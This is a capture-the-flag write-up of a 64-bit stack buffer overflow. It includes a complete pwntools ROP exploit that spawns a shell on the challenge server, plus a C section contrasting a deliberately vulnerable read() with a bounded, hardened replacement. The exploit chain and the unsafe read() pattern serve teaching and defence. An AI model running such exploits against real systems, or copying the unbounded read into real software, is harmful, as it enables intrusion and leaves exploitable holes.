The binary contains no "/bin/sh" string, but it does contain "$0" (which, passed to system(), still starts a shell because sh expands $0 to its own name).
Because 64-bit programs, unlike 32-bit ones, pass function arguments in registers, the argument for system has to be placed in rdi via a gadget rather than on the stack.
Approach: use the read function to overflow the 0x10-byte stack buffer, build a ROP chain, call system, and pass its argument through rdi.
exp
from pwn import *

p = remote('114.116.54.89', 10004)

rop = 0x4007d3       # gadget that pops the next stack word into rdi (inferred from the chain layout below)
_system = 0x400570   # address of system, as given in the writeup
bin_sh = 0x60111f    # address of the "$0" string, used in place of "/bin/sh"

p.recvuntil(b'Come on,try to pwn me')
# 0x10-byte buffer + 8 bytes of saved rbp, then the chain: gadget -> argument -> system
payload = b'9' * (0x10 + 8) + p64(rop) + p64(bin_sh) + p64(_system)
p.sendline(payload)
p.interactive()
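The bug the writeup relies on is a read() whose length is unrelated to the size of the 0x10-byte buffer it fills, so the saved rbp and the return address after the buffer get overwritten. The following is an added example, not the challenge's source or the writeup's code; the shape of vulnerable_read is a reconstruction (an assumption, since the page does not show the binary's source). It shows the pattern beside a bounded replacement that never writes past the buffer and reports over-long input so a service can log or reject it instead of silently accepting it.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 0x10   /* same buffer size as the one the writeup overflows */

/* Reconstruction of the vulnerable pattern (assumption, not the challenge's
 * actual source): read() may deliver far more than 16 bytes, so everything
 * after buf on the stack (saved rbp, return address) is overwritten.
 * Shown for comparison only; nothing below calls it. */
void vulnerable_read(void) {
    char buf[BUF_SIZE];
    read(0, buf, 0x100);            /* length has no relation to sizeof buf */
}

/* Hardened replacement: reads one line, stores at most bufsz-1 bytes,
 * NUL-terminates, and discards (rather than writes) any excess. Sets
 * *overflowed to 1 when input exceeded the buffer so the caller can
 * treat it as a suspicious/oversized request. Returns the number of
 * bytes stored, or -1 on read error. */
ssize_t read_line_bounded(int fd, char *buf, size_t bufsz, int *overflowed) {
    size_t len = 0;
    char c;

    *overflowed = 0;
    if (bufsz == 0) {
        errno = EINVAL;
        return -1;
    }
    for (;;) {
        ssize_t r = read(fd, &c, 1);
        if (r < 0) {
            if (errno == EINTR)
                continue;           /* interrupted: retry */
            return -1;
        }
        if (r == 0 || c == '\n')
            break;                  /* EOF or end of line */
        if (len < bufsz - 1)
            buf[len++] = c;         /* store only while room remains */
        else
            *overflowed = 1;        /* excess bytes are dropped, never written */
    }
    buf[len] = '\0';
    return (ssize_t)len;
}

int main(void) {
    char buf[BUF_SIZE];
    int overflowed;

    ssize_t n = read_line_bounded(0, buf, sizeof buf, &overflowed);
    if (n < 0) {
        perror("read");
        return 1;
    }
    printf("stored %zd bytes: \"%s\"%s\n", n, buf,
           overflowed ? " (input exceeded buffer, excess discarded)" : "");
    return 0;
}
```

Run with `printf '%064d\n' 0 | ./a.out` to see the over-long case reported: only 15 bytes are stored, the terminator is always written inside the buffer, and the flag tells the caller that the peer sent more than the protocol allows, which is exactly the condition a bounds-unaware read() would have turned into a stack overwrite.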